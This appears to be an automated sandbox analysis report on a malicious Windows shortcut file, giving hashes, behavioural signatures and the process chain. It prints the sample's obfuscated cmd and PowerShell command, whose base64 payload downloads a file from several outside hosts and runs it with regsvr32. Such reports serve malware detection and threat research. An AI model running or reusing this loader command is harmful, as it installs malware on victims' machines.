Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 21:38
Static task
static1
Behavioral task
behavioral1
Sample
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
Resource
win10v2004-20241007-en
General
-
Target
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
-
Size
2KB
-
MD5
e567fd6bd2ad541ea7cff36788a1cb04
-
SHA1
335983d1da7118026ec9cb6befd1cbd3a84edf9b
-
SHA256
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b
-
SHA512
fba256493c808dfae95cac6282f23ec756ce1d6b9ee7fe3ad8f70d43dce4569a3830467c4d30d6d2fac8479497a819c186a997b70ce84ab444f66bc4334cf67c
Malware Config
Signatures
-
Blocklisted process makes network request 19 IoCs
Processes:
powershell.exeflow pid Process 8 3672 powershell.exe 13 3672 powershell.exe 22 3672 powershell.exe 23 3672 powershell.exe 25 3672 powershell.exe 28 3672 powershell.exe 31 3672 powershell.exe 34 3672 powershell.exe 39 3672 powershell.exe 40 3672 powershell.exe 41 3672 powershell.exe 44 3672 powershell.exe 45 3672 powershell.exe 46 3672 powershell.exe 48 3672 powershell.exe 53 3672 powershell.exe 54 3672 powershell.exe 57 3672 powershell.exe 58 3672 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation cmd.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid Process 4276 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 3672 powershell.exe 3672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 3672 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid Process procid_target PID 804 wrote to memory of 4276 804 cmd.exe 84 PID 804 wrote to memory of 4276 804 cmd.exe 84 PID 4276 wrote to memory of 3672 4276 cmd.exe 85 PID 4276 wrote to memory of 3672 4276 cmd.exe 85 PID 3672 wrote to memory of 1712 3672 powershell.exe 95 PID 3672 wrote to memory of 1712 3672 powershell.exe 95
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c Vy+KY28nm8jrFR/pN6hHEEnR9ZQSXCM52YkkW9kA5wMTB3nmG+JcpYgkGoLMzE+MnYyHqio9||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD4⤵PID:1712
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59e9b48ae75ae39fd45ebf6799c9668d8
SHA17ed5cac9a268359ac09719dbbf354a83c23b1236
SHA256bd19fca5c89301abcf7cceaa75294bc7981f1a4bea7ffeb29260c9716960f761
SHA512c4b49773eba7ac113669f30444142bfb830b51f577795bcce45ebe382271f2f07a785fe47d10b5d18817e13bb7551563814552d174eee9f6e6f08c448ab31723
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82